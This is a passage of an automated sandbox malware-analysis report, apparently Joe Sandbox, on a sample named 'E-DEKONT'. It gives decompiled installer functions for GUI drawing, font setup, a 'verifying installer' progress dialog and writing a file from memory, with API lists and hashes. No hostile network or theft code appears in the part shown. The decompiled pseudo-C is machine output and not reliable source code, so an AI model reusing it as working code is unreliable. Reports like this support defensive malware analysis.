				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                                                            0x00404290
                                                                            0x00404324
                                                                            0x00000000
                                                                            0x00404324
                                                                            0x004042a1
                                                                            0x004042a5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x004042ab
                                                                            0x004042b4
                                                                            0x004042b7
                                                                            0x004042b7
                                                                            0x004042bd
                                                                            0x004042c3
                                                                            0x004042c3
                                                                            0x004042cf
                                                                            0x004042d5
                                                                            0x004042dc
                                                                            0x004042df
                                                                            0x004042e2
                                                                            0x004042e4
                                                                            0x004042e4
                                                                            0x004042ec
                                                                            0x004042f2
                                                                            0x004042f2
                                                                            0x004042fc
                                                                            0x00404301
                                                                            0x00404304
                                                                            0x00404309
                                                                            0x0040430c
                                                                            0x0040430c
                                                                            0x0040431c
                                                                            0x0040431c
                                                                            0x00000000

                                                                            APIs
                                                                            • GetWindowLongW.USER32(?,000000EB), ref: 0040429B
                                                                            • GetSysColor.USER32(00000000), ref: 004042B7
                                                                            • SetTextColor.GDI32(?,00000000), ref: 004042C3
                                                                            • SetBkMode.GDI32(?,?), ref: 004042CF
                                                                            • GetSysColor.USER32(?), ref: 004042E2
                                                                            • SetBkColor.GDI32(?,?), ref: 004042F2
                                                                            • DeleteObject.GDI32(?), ref: 0040430C
                                                                            • CreateBrushIndirect.GDI32(?), ref: 00404316
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                            • String ID:
                                                                            • API String ID: 2320649405-0
                                                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction ID: b3876bbcbbff373df079470ccdc5149205509338ab7e68b668f4883140def8c6
                                                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                            • Instruction Fuzzy Hash: B22151B1600704ABCB219F68DE08B5BBBF8AF41714F04897DFD96E26A0D734E944CB64
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004052E6 Relevance: 10.6, APIs: 7, Instructions: 72stringwindowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E004052E6(signed int _a4, WCHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				WCHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				WCHAR* _t27;
				signed int _t28;
				long _t29;
				signed int _t37;
				signed int _t38;

				_t27 =  *0x433ec4;
				_v8 = _t27;
				if(_t27 != 0) {
					_t37 =  *0x434fb4;
					_v12 = _t37;
					_t38 = _t37 & 0x00000001;
					if(_t38 == 0) {
						E004062A4(_t38, 0, 0x42c228, 0x42c228, _a4);
					}
					_t27 = lstrlenW(0x42c228);
					_a4 = _t27;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t27 = SetWindowTextW( *0x433ea8, 0x42c228);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x42c228;
							_v52 = 1;
							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t38;
							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
						}
						if(_t38 != 0) {
							_t28 = _a4;
							0x42c228[_t28] = 0;
							return _t28;
						}
					} else {
						_t27 = lstrlenW(_a8) + _a4;
						if(_t27 < 0x1000) {
							_t27 = lstrcatW(0x42c228, _a8);
							goto L6;
						}
					}
				}
				return _t27;
			}

















                                                                            0x004052ec
                                                                            0x004052f6
                                                                            0x004052fb
                                                                            0x00405301
                                                                            0x0040530c
                                                                            0x0040530f
                                                                            0x00405312
                                                                            0x00405318
                                                                            0x00405318
                                                                            0x0040531e
                                                                            0x00405326
                                                                            0x00405329
                                                                            0x00405346
                                                                            0x0040534a
                                                                            0x00405353
                                                                            0x00405353
                                                                            0x0040535d
                                                                            0x00405366
                                                                            0x00405372
                                                                            0x00405379
                                                                            0x0040537d
                                                                            0x00405380
                                                                            0x00405393
                                                                            0x004053a1
                                                                            0x004053a1
                                                                            0x004053a5
                                                                            0x004053a7
                                                                            0x004053aa
                                                                            0x00000000
                                                                            0x004053aa
                                                                            0x0040532b
                                                                            0x00405333
                                                                            0x0040533b
                                                                            0x00405341
                                                                            0x00000000
                                                                            0x00405341
                                                                            0x0040533b
                                                                            0x00405329
                                                                            0x004053b6

                                                                            APIs
                                                                            • lstrlenW.KERNEL32(0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000,?), ref: 0040531E
                                                                            • lstrlenW.KERNEL32(0040325E,0042C228,00000000,0041D800,75F623A0,?,?,?,?,?,?,?,?,?,0040325E,00000000), ref: 0040532E
                                                                            • lstrcatW.KERNEL32(0042C228,0040325E), ref: 00405341
                                                                            • SetWindowTextW.USER32(0042C228,0042C228), ref: 00405353
                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405379
                                                                            • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405393
                                                                            • SendMessageW.USER32(?,00001013,?,00000000), ref: 004053A1
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                            • String ID:
                                                                            • API String ID: 2531174081-0
                                                                            • Opcode ID: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                            • Instruction ID: 0b7e0c68d9dca976d3f5af37e2abe0e5b3dfc86658143eccbc3f009734cc3570
                                                                            • Opcode Fuzzy Hash: 431f9b9f519d5dcc2d02559eb98ffe4ebe6b5718b6beea2b4038e3bce57f3186
                                                                            • Instruction Fuzzy Hash: 3F21A171900518BACF11AFA5DD859CFBFB4EF85350F14817AF944B6290C7B98A90CFA8
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00404BB0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00404BB0(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                                                            0x00404bbe
                                                                            0x00404bcb
                                                                            0x00404bd1
                                                                            0x00404c0f
                                                                            0x00404c0f
                                                                            0x00404c1e
                                                                            0x00404c25
                                                                            0x00000000
                                                                            0x00404c27
                                                                            0x00404bd3
                                                                            0x00404be2
                                                                            0x00404bea
                                                                            0x00404bed
                                                                            0x00404bff
                                                                            0x00404c05
                                                                            0x00404c0c
                                                                            0x00000000
                                                                            0x00404c0c
                                                                            0x00000000

                                                                            APIs
                                                                            • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BCB
                                                                            • GetMessagePos.USER32 ref: 00404BD3
                                                                            • ScreenToClient.USER32(?,?), ref: 00404BED
                                                                            • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFF
                                                                            • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C25
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Message$Send$ClientScreen
                                                                            • String ID: f
                                                                            • API String ID: 41195575-1993550816
                                                                            • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction ID: fcc096391eddebe8eb85a5aa76d4b30f922b4a39187f2a8acbab72006efdbce5
                                                                            • Opcode Fuzzy Hash: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                            • Instruction Fuzzy Hash: 31015E71900218BAEB10DB94DD85BFEBBBCAF95B11F10412BBA50B62D0D7B499418BA4
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00401DB3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 73%
                                                                            			E00401DB3(intOrPtr __edx) {
				void* __esi;
				int _t9;
				signed char _t15;
				struct HFONT__* _t18;
				intOrPtr _t30;
				struct HDC__* _t31;
				void* _t33;
				void* _t35;

				_t30 = __edx;
				_t31 = GetDC( *(_t35 - 8));
				_t9 = E00402C15(2);
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				0x40cdd8->lfHeight =  ~(MulDiv(_t9, GetDeviceCaps(_t31, 0x5a), 0x48));
				ReleaseDC( *(_t35 - 8), _t31);
				 *0x40cde8 = E00402C15(3);
				_t15 =  *((intOrPtr*)(_t35 - 0x18));
				 *((intOrPtr*)(_t35 - 0x4c)) = _t30;
				 *0x40cdef = 1;
				 *0x40cdec = _t15 & 0x00000001;
				 *0x40cded = _t15 & 0x00000002;
				 *0x40cdee = _t15 & 0x00000004;
				E004062A4(_t9, _t31, _t33, "Calibri",  *((intOrPtr*)(_t35 - 0x24)));
				_t18 = CreateFontIndirectW(0x40cdd8);
				_push(_t18);
				_push(_t33);
				E004061C9();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}











                                                                            0x00401db3
                                                                            0x00401dbe
                                                                            0x00401dc0
                                                                            0x00401dcd
                                                                            0x00401de4
                                                                            0x00401de9
                                                                            0x00401df6
                                                                            0x00401dfb
                                                                            0x00401dff
                                                                            0x00401e0a
                                                                            0x00401e11
                                                                            0x00401e23
                                                                            0x00401e29
                                                                            0x00401e2e
                                                                            0x00401e38
                                                                            0x0040258c
                                                                            0x0040156d
                                                                            0x00402a65
                                                                            0x00402ac2
                                                                            0x00402ace

                                                                            APIs
                                                                            • GetDC.USER32(?), ref: 00401DB6
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DD0
                                                                            • MulDiv.KERNEL32(00000000,00000000), ref: 00401DD8
                                                                            • ReleaseDC.USER32(?,00000000), ref: 00401DE9
                                                                            • CreateFontIndirectW.GDI32(0040CDD8), ref: 00401E38
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: CapsCreateDeviceFontIndirectRelease
                                                                            • String ID: Calibri
                                                                            • API String ID: 3808545654-1409258342
                                                                            • Opcode ID: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                            • Instruction ID: 8058adb7fc53f801c03006c9ef56a62efa99793a140a93f16ed6c143b7d909dc
                                                                            • Opcode Fuzzy Hash: 8f9191b43f1087fd91e2bc6620e9991732759c8a76e5fb6f86f4dddf7fac1548
                                                                            • Instruction Fuzzy Hash: 9A015271944240EFE701ABB4AE8A6D97FB49F95301F10457EE241F61E2CAB800459F2D
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x4169f8; // 0x4f892
					_t11 =  *0x422a04; // 0x4f896
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}






                                                                            0x00402de7
                                                                            0x00402df5
                                                                            0x00402dfb
                                                                            0x00402dfb
                                                                            0x00402e09
                                                                            0x00402e0b
                                                                            0x00402e11
                                                                            0x00402e18
                                                                            0x00402e1a
                                                                            0x00402e1a
                                                                            0x00402e30
                                                                            0x00402e40
                                                                            0x00402e52
                                                                            0x00402e52
                                                                            0x00402e5a

                                                                            APIs
                                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                                            • MulDiv.KERNEL32(0004F892,00000064,0004F896), ref: 00402E20
                                                                            • wsprintfW.USER32 ref: 00402E30
                                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                                            Strings
                                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108849702667.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.108849661301.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849775386.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108849822907.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850090566.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850129247.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850189969.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850231239.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850274459.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850335304.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850372286.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108850412700.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                                            • String ID: verifying installer: %d%%
                                                                            • API String ID: 1451636040-82062127
                                                                            • Opcode ID: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                            • Instruction ID: 0244175548504e0de7267acb57bf05e9e9b1595e8d7e84e5cb6d98a661a40fbb
                                                                            • Opcode Fuzzy Hash: f82802282f146ff8d7a81516d08dd23d853d0675b9ceba9b20e767ba0194de88
                                                                            • Instruction Fuzzy Hash: B6014470640208BBDF209F50DE49FAA3B69BB00304F008039FA46A51D0DBB889558B59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 76%
                                                                            			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}











                                                                            0x100024ae
                                                                            0x100024b0
                                                                            0x100024bf
                                                                            0x100024c5
                                                                            0x100024d2
                                                                            0x100024d4
                                                                            0x100024d8
                                                                            0x100024d8
                                                                            0x100024e0
                                                                            0x100024e6
                                                                            0x100024e8
                                                                            0x00000000
                                                                            0x100024ef
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100024f5
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100024ff
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002506
                                                                            0x1000250c
                                                                            0x10002518
                                                                            0x1000251e
                                                                            0x10002523
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x10002545
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000252b
                                                                            0x10002531
                                                                            0x10002532
                                                                            0x10002534
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x1000254d
                                                                            0x1000254f
                                                                            0x10002551
                                                                            0x10002553
                                                                            0x10002553
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x100024e8
                                                                            0x10002556
                                                                            0x10002556
                                                                            0x1000255b
                                                                            0x1000256d
                                                                            0x1000256d
                                                                            0x10002573
                                                                            0x10002578
                                                                            0x1000257d
                                                                            0x10002589
                                                                            0x1000258e
                                                                            0x00000000
                                                                            0x10002593
                                                                            0x1000257f
                                                                            0x10002580
                                                                            0x10002594
                                                                            0x10002594
                                                                            0x1000257d
                                                                            0x10002595
                                                                            0x10002599
                                                                            0x1000259c
                                                                            0x100025b3

                                                                            APIs
                                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                            • GlobalFree.KERNEL32(?), ref: 1000256D
                                                                            • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.108853027321.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                            • Associated: 00000001.00000002.108852995308.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853063601.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            • Associated: 00000001.00000002.108853098522.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_10000000_E-DEKONT.jbxd
                                                                            Similarity
                                                                            • API ID: Global$Free$Alloc
                                                                            • String ID:
                                                                            • API String ID: 1780285237-0
                                                                            • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                            • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                                            • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                                            • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 86%
                                                                            			E004028A7(int __ebx) {
				void* _t26;
				long _t31;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405BCA(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405D4F(_t50);
				_t26 = E00405D74(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x434ef8;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E0040332B(_t45);
						E00403315(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							E004030FA( *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405D2F( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405E26( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E004030FA(0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}











                                                                            0x004028a7
                                                                            0x004028a9
                                                                            0x004028b5
                                                                            0x004028b8
                                                                            0x004028c2
                                                                            0x004028c6
                                                                            0x004028c6
                                                                            0x004028cc
                                                                            0x004028d9
                                                                            0x004028e1
                                                                            0x004028e4
                                                                            0x004028ea
                                                                            0x004028f8
                                                                            0x004028fd
                                                                            0x00402901
                                                                            0x00402904
                                                                            0x0040290d
                                                                            0x00402919
                                                                            0x0040291d
                                                                            0x00402920
                                                                            0x0040292a
                                                                            0x00402949
                                                                            0x00402931
                                                                            0x00402936
                                                                            0x0040293e
                                                                            0x00402941
                                                                            0x00402946
                                                                            0x00402946
                                                                            0x00402950
